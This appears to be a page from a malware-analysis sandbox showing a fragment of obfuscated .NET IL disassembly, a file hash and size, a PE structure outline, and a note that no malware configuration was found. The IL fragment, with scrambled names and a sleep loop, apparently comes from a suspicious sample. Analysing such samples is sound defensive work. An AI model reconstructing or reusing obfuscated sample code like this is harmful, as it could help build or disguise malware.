WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::yDOOwojfWejIYEJffxAfvZsJj stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xNWiQBqZUOX() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::drmOfIJufLxPAB stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WEhjoTdTBLaCYTLj() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::gXlfcxqcAlKQML stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EGwENKLiVKody() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::fiVkjcxrtQnvEBYKEf stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ZsVraBtEqcZEmmUKxqHNPIaQJ() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NsSDjXjbXBvetoEPqXYz stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::VBSIpqDMBJCckhTAQUfIXZOK() call System.String mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::gdqbZjWinCKstkIC() stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh pop <null> leave IL_02AE: ret ret <null>
3d8e1e059c4924d652994cb74c893cfa (481.54 KB)
File Structure
3d8e1e059c4924d652994cb74c893cfa
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yad7i4kpm66q2iv3t0s5lzbhrr
px3f7aqmhctkn72bt5v
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙